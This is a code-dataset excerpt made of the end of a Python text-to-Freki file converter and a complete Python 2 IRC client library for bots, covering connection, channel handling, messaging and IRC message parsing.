line_dict[num] = (tags[num - start], 's' + str(s_index))
s_index += 1
frek = FrekiDoc()
text = re.sub(r'(\r\n|\n){2,}', '\n\n', text)
blocks = re.split('\n\n', text)
index = 1
b_index = 1
for para in blocks:
lines = re.split('\r\n|\n', para)
linenos = []
for line in lines:
f_line = FrekiLine(line)
f_line.attrs['line'] = index
linenos.append(index)
if index in line_dict:
f_line.attrs['tag'] = line_dict[index][0]
f_line.attrs['span_id'] = line_dict[index][1]
frek.add_line(f_line)
index += 1
block = FrekiBlock(linenos, linenos[0], linenos[-1], frek)
block._attrs['page'] = '1'
block._attrs['block_id'] = 'b' + str(b_index)
block._attrs['doc_id'] = doc_id
b_index += 1
frek.add_block(block)
return frek
def read_and_convert(path, igt_path=None, encoding='utf-8', detect_encoding=False):
"""
Read in a text file and convert it to freki. igt_path file format: startline endline tag1 tag2 ... tagN\n
:param path: path to the text file
:param igt_path: path to the text file containing IGT span info
:param encoding: name of the encoding of the file
:param detect_encoding: setting to true will first detect an encoding rather than using the default.
:return: freki object
"""
name = path.split('/')[-1].split('.')[0]
igt_text = None
if detect_encoding:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('Using encoding: ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet')
else:
try:
text = codecs.open(path, encoding=encoding, errors='strict').read()
if igt_path:
igt_text = codecs.open(igt_path, encoding=encoding).read()
except UnicodeDecodeError:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('The file cannot be read using encoding ' + encoding + '. Instead using ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet\n')
logging.info("If encoding " + p_predict['encoding'] + ' is not correct please specify the encoding as an argument')
logging.info('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
except LookupError:
print('Unknown encoding. If you want the system to automatically detect an encoding set detect_encoding=True')
print('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
raise
frek = convert_text(name, text, igt_text)
return frek
def main(arglist=None):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Convert a plain text file to Freki format",
prog='text-to-freki',
epilog='examples:\n'
' text-to-freki in.txt out.freki --igtfile=igts.txt --detect-encoding=true'
)
parser.add_argument('infile', help='plain text file')
parser.add_argument('outfile', help='path to freki output file')
parser.add_argument('--igtfile', help='plain text file containing igt span info')
parser.add_argument('--encoding', default='utf-8', help='encoding of the input file')
parser.add_argument(
'-d', '--detect-encoding', dest='detect', default=False, help='automatically detects encoding when set to true'
)
parser.add_argument(
'-v', '--verbose',
action='count', dest='verbosity', default=2,
help='increase the verbosity (can be repeated: -vvv)'
)
args = parser.parse_args(arglist)
logging.basicConfig(level=50-(args.verbosity*10))
run(args)
if __name__ == '__main__':
main() | mit | 3,247,367,411,610,069,000 | 41.083333 | 142 | 0.592837 | false |
deadc0de6/pyircbot | libirc.py | 1 | 18336 | # author: deadc0de6
# contact: https://github.com/deadc0de6
#
# python IRC library
#
# Copyright (C) 2015 deadc0de6
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ref:
# RFC 2812: https://tools.ietf.org/html/rfc2812
# https://www.alien.net.au/irc/irc2numerics.html
#
import socket
import ssl
import sys
import os
import time
import datetime
import string
import random
import threading
import signal
import select
import Queue
class libirc():
BUFLEN = 65535 # buffer to read IRC server message
DEBUG = False
LOGCHAT_NBLINE = 100 # per channel
CONN_TIMEOUT = 5 # second
SELECTTO = 1
ISOPER = False
SSL_CERT_PATH = '/etc/ssl/certs/ca-certificates.crt'
IRC_CMD_QUIT = 'quit'
IRC_CMD_PASS = 'pass'
IRC_CMD_JOIN = 'join' # <channel>
IRC_CMD_USER = 'user' # <username> <hostname> <servername> <realname>
IRC_CMD_NICK = 'nick' # <nickname>
IRC_CMD_PRIVMSG = 'privmsg' # <user> <message>
IRC_CMD_PING = 'ping'
IRC_CMD_PONG = 'pong'
IRC_CMD_LIST = 'list'
IRC_CMD_OPER = 'oper'
IRC_CMD_KICK = 'kick'
IRC_CMD_KILL = 'kill'
IRC_CMD_ERROR = 'error'
IRC_CMD_NAMES = 'names'
IRC_CMD_WHO = 'who'
IRC_CMD_NOTICE = 'notice'
IRC_CMD_CHANNEL = '321'
IRC_CMD_ACHANNEL = '322'
IRC_CMD_CHANNEL_END = '323'
IRC_CMD_MOTD = '375'
IRC_CMD_MTD_END = '376'
IRC_ERR_NICK = '433'
IRC_CMD_CHAN_NAMES = '353'
IRC_CMD_OPER_OK = '381'
# @host: irc server address
# @port: irc server port
# @ssl: use SSL (True) or not (False
# @nick: the bot nick
# @channel: the bot channel
# @threaded: is it to be threaded
# TODO really need the threaded option ??
def __init__(self, host, port, ssl, nick, channel, threaded=True):
self._server_host = host
self._server_port = port
self._server_ssl = ssl
self._nick = nick
self._orichannel = channel
self._threaded = threaded # call to callback are threaded
# some glob vars
self._pwd = None # server password
self._channels = [] # list of channels
self._conn_channels = [] # list of channels
self._nicks = [] # list of nicks on channels I'm on
self._connected = False
self._stop = False
self._logchat = False
self._logchat_logs = {} # for each channel name a list of exchange
self._sndqueue = Queue.Queue()
# callbacks
self._irc_event_on_message = None
self._irc_event_on_privmessage = None
self._irc_event_on_disconnect = None
self._irc_event_on_connect = None
self._irc_event_on_new_channel = None
self._irc_event_on_servping = None
self._irc_event_on_othermsg = None
self._irc_event_on_conn_channel = None
# dirty hack as SIG are not catched by the KeyboardInterrupt
signal.signal(signal.SIGINT, self._signal_handler)
def set_password(self, pwd):
self._pwd = pwd
# enable/disable the log chat features
# logs N lines of each channel it is on
def irc_set_logchat(self, boolean):
self._logchat = boolean
def set_callback(self, on_privmessage = None, on_message = None,\
on_disconnect = None, on_connect = None,\
on_new_channel = None, on_servping = None, on_othermsg = None,\
on_conn_chan = None):
self._irc_event_on_privmessage = on_privmessage
self._irc_event_on_message = on_message
self._irc_event_on_disconnect = on_disconnect
self._irc_event_on_connect = on_connect
self._irc_event_on_new_channel = on_new_channel
self._irc_event_on_servping = on_servping
self._irc_event_on_othermsg = on_othermsg
self._irc_event_on_conn_channel = on_conn_chan
def irc_listchannels(self):
if self._socket == None:
return False
self._irc_send_cmd(self.IRC_CMD_LIST, [])
return True
def irc_join_channel(self, chanstr):
if self._socket == None:
return False
if not chanstr in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_JOIN, [chanstr])
self._conn_channels.append(chanstr)
return True
# send a message to all channel I'm on
def irc_send_to_all_channels(self, msg):
for chan in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
# send a message to a channel
def irc_channel_broadcast(self, chan, msg):
if not self._connected:
return False
if not chan in self._conn_channels:
return False
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
return True
# send a private message to a user
def irc_privmsg(self, user, msg):
if not self._connected:
return False
for i in msg.splitlines():
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [user], [i])
return True
# kill a user
def irc_kill(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self._irc_send_cmd(self.IRC_CMD_KILL, [user, reason])
return True
# kick user from all channels
def irc_kick_all(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self.irc_kick(user, '*', reason)
return True
# kick a user from a channel
# syntax: kick <channel> <user> <reason>
def irc_kick(self, user, channel, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self._irc_send_cmd(self.IRC_CMD_KICK, [user, channel, reason])
return True
# do we know this user
def irc_known_nick(self, user):
return (user in self._nicks)
# 0 means all line
def irc_get_chan_logs(self, chan, nbline=0):
nbline = int(nbline)
if not self._logchat:
return None
if not chan in self._logchat_logs:
return None
if nbline == 0 or nbline > len(self._logchat_logs[chan]):
return self._logchat_logs[chan]
else:
tmp = self._logchat_logs[chan][-nbline:]
return tmp
def _signal_handler(self, signum, frame):
self._stop = True
# timestamp to string
def _ts2str(self, ts):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# print debug message
def _irc_debug(self, txt):
datestr = self._ts2str(time.time())
sys.stderr.write("[IRC] <" + datestr + "> " + txt + "\n")
# print error message
def _irc_err(self, txt):
sys.stderr.write("[IRC ERROR] " + txt)
# this is the main loop reading from the socket
def _irc_read_loop(self):
success = True
self._irc_debug('bot started (read loop started) ....')
self._socket.setblocking(0)
try:
while not self._stop:
try:
wsocks = []
rsocks = [self._socket]
esocks = [self._socket]
if not self._sndqueue.empty():
wsocks.append(self._socket)
iready,oready,eready = select.select(rsocks, wsocks, esocks,
self.SELECTTO)
if self._socket in eready:
self._irc_debug('[ERROR] socket error in select')
if self._socket in oready and not self._sndqueue.empty():
data = self._sndqueue.get()
self._socket.send(data)
if self._socket in iready:
data = self._socket.recv(self.BUFLEN)
for line in data.splitlines():
if not self._irc_handle_line(line):
# not very resilient
success = False
break
if not success:
break
except socket.error as serr:
#pass
# TODO
self._irc_err('socket error')
print serr
except select.error as serr:
#pass
# TODO
self._irc_err('select error')
print serr
except KeyboardInterrupt:
print 'interrupted ...'
self._irc_debug('bot ended (read loop exited)')
return success
# handle anything that appears on the IRC and that I see
def _irc_handle_line(self, line):
if line == None or line == '':
return True
#try:
if self.DEBUG:
self._irc_debug("<- " + line)
# TODO from here
msg = ircmsg(line)
if msg.cmd == self.IRC_CMD_CHANNEL:
# start of channel list
self._irc_debug('start of channel listing')
elif msg.cmd == self.IRC_CMD_CHANNEL_END:
# end of channel list
self._irc_debug('end of channel listing')
elif msg.cmd == self.IRC_CMD_ACHANNEL:
# new channel
self._irc_debug('<- new channel: %s' % (msg.param[1]))
self._channels.append(msg.param[1])
if self._irc_event_on_new_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_new_channel,
args=(msg.param[1],))
t.start()
else:
self._irc_event_on_new_channel(name)
elif msg.cmd == self.IRC_CMD_MTD_END:
# end of MOTD
self._irc_debug('joining channel: %s' % (self._orichannel))
self._connected = True
self.irc_join_channel(self._orichannel)
elif msg.cmd == self.IRC_CMD_OPER_OK:
self.ISOPER = True
elif msg.cmd == self.IRC_ERR_NICK:
# nick registration error
self._nick = self._nick + "^"
self._irc_debug('changing nick to: %s' % (self._nick))
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick])
elif msg.cmd == self.IRC_CMD_PING:
# this is a PING from server
self._irc_debug('<- \"ping\"')
self._irc_send_cmd(self.IRC_CMD_PONG, [msg.src])
if self._irc_event_on_servping != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_servping)
t.start()
else:
self._irc_event_on_servping()
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] == self._nick:
# this is a private message sent to myself
self._irc_debug('<- private message to me')
if self._irc_event_on_privmessage != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_privmessage, args=(msg,))
t.start()
else:
self._irc_event_on_privmessage(msg)
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] != self._nick:
# this is a message sent to a channel I'm on
self._irc_debug('<- message in channel: %s' % (msg.param[0]))
if self._irc_event_on_message != None:
if self._logchat:
self._irc_log(msg)
if self._threaded:
t = threading.Thread(target=self._irc_event_on_message, args=(msg,))
t.start()
else:
self._irc_event_on_message(msg)
elif msg.cmd == self.IRC_CMD_JOIN:
if msg.user != self._nick:
# another user join our channel
self._nicks.append(msg.user)
else:
if msg.msg[0] in self._conn_channels:
if self._irc_event_on_conn_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_conn_channel,
args=(msg.msg[0],))
t.start()
else:
self._irc_event_on_conn_channel(msg.msg[0])
elif msg.cmd == self.IRC_CMD_CHAN_NAMES:
# list of names in the channel
for u in msg.msg:
if not u in self._nicks and u != self._nick:
self._nicks.append(u)
self._irc_debug('nicks list updated: %s' % (','.join(self._nicks)))
elif msg.cmd == self.IRC_CMD_ERROR:
# oops some error
self._irc_debug('ERROR ! (%s)' % (' '.join(msg.msg)))
return False
elif msg.cmd == self.IRC_CMD_NOTICE:
# this is a notice
self._irc_debug('notice received: %s %s' % (msg.param[0],
' '.join(msg.msg)))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
else:
# this is what's left
#self._irc_debug('other message received: %s' % (msg.cmd))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
#except Exception as msg:
# print msg
# exc_type, exc_obj, exc_tb = sys.exc_info()
# fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
# print exc_type, fname, exc_tb.tb_lineno
# return False
return True
def _irc_log(self, ircmsg):
user = ircmsg.user
chan = ircmsg.param[0]
msg = ' '.join(ircmsg.msg)
if chan in self._logchat_logs:
tmp = self._logchat_logs[chan]
if len(self._logchat_logs) > self.LOGCHAT_NBLINE:
# remove one
del tmp[0]
tmp.append('[%s] %s' % (user, msg))
self._logchat_logs[chan] = tmp
else:
l = ['[%s] %s' % (user, msg)]
self._logchat_logs[chan] = l
# send an IRC command to the server
# if txt is true, it accepts space in message (last part)
# usually for command use txt=False and for message use txt=True
def _irc_send_cmd(self, cmd, params, msg=[], log=True):
if self._socket == None:
return False
data = '%s %s' % (cmd, ' '.join(params))
if msg != []:
data += ' :%s' % (' '.join(msg))
data += '\n'
if log:
self._irc_debug('-> \"%s\"' % (data.rstrip()))
self._sndqueue.put(data)
return True
# connect to IRC server
def irc_connect(self):
sock = None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if self._server_ssl:
# https://docs.python.org/2/library/ssl.html
sock = ssl.wrap_socket(s, server_side=False)
else:
sock = s
sock.settimeout(self.CONN_TIMEOUT)
sock.connect((self._server_host, int(self._server_port)))
sock.settimeout(None)
except socket.error as err:
self._irc_err("Connection error: ")
print err
if self._server_ssl:
sock.unwrap()
sock.close()
return False
self._irc_debug("IRC socket connected!")
self._socket = sock
if self._irc_event_on_connect != None:
self._irc_debug('calling connect callback ...')
if self._threaded:
t = threading.Thread(target=self._irc_event_on_connect)
t.start()
else:
self._irc_event_on_connect()
#self._irc_debug('calling read-loop ...')
#t = threading.Thread(target=self._irc_read_loop)
#t.start()
# conn and nick
time.sleep(1)
self._irc_debug('sending nick and other information to the server ...')
self._irc_send_cmd(self.IRC_CMD_PASS, [self._pwd], log=False)
self._irc_send_cmd(self.IRC_CMD_USER, [self._nick, self._nick, self._nick], [self._nick], log=False)
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick], log=False)
# start the read loop
self._irc_debug('calling read-loop ...')
res = self._irc_read_loop()
try:
if self._server_ssl:
self._socket.unwrap()
except:
pass
self._socket.close()
return res
def irc_gooper(self, username, password):
if username != '' and password != '':
self._irc_debug('going operator ...')
self._irc_send_cmd(self.IRC_CMD_OPER, [username, password], log=False)
# disconnect to IRC server and close socket
def irc_disconnect(self):
# first send the quit command
self._irc_debug('disconnecting ...')
self._stop = True
if self._socket != None or not self._connected:
self._irc_debug("sending the IRC quit command !")
self._irc_send_cmd(self.IRC_CMD_QUIT, [])
# close the socket
if self._socket != None:
self._socket.close()
self._irc_debug('calling disconnect callback...')
if self._irc_event_on_disconnect != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_disconnect)
t.start()
else:
self._irc_event_on_disconnect()
class ircmsg():
DEBUG = False
def __init__(self, line):
self._line = line
self.user = '' # the user that sent the message
self.src = '' # the address of the user (username@IP)
self.cmd = '' # the IRC command in the message
self.param = [] # the target of the message (#<channel> or user)
self.msg = [] # the message
self._parse_line()
# this is a naive parser
def _parse_line(self):
# format:
# :<prefix> <command> <params> :<trailing>
#try:
# identify the parts
if self.DEBUG:
self._err('full line: \"%s\"' % (self._line))
prefixend = 0
trailingstart = len(self._line)
if self._line.startswith(':'):
# prefix
dummy = self._line[1:]
prefix = dummy.split(' ')[0]
prefixend = len(prefix)+1
if '!' in prefix:
self.user = prefix.split('!')[0].lower()
self.src = prefix.split('!')[1].lower()
else:
self.src = prefix
if self.DEBUG:
self._err('prefix: %s' % (prefix))
if ' :' in self._line:
# trailing
trailing = self._line.split(' :')[1]
trailingstart = self._line.index(' :')
if self.DEBUG:
self._err('trailing: %s' % (trailing))
self.msg = [x.lower() for x in trailing.split(' ')]
cmdparams = self._line[prefixend:trailingstart].strip()
if self.DEBUG:
self._err('cmdparams: %s' % (cmdparams))
self.cmd = cmdparams.split(' ')[0].lower()
self.param = [x.lower() for x in cmdparams.split(' ')[1:]]
#except:
# self._err(self._line)
if self.DEBUG:
self.print_msg()
def _err(self, string):
sys.stderr.write('[IRCMSG] %s\n' % (string))
def print_msg(self):
self._err('Message (%s)' % (self._line))
self._err('\tuser: %s' % (self.user))
self._err('\tsrc: %s' % (self.src))
self._err('\tcmd: %s' % (self.cmd))
self._err('\tparam: %s' % (','.join(self.param)))
self._err('\tmsg: %s' % (','.join(self.msg)))
| gpl-2.0 | -3,772,198,053,339,212,000 | 31.39576 | 104 | 0.602694 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.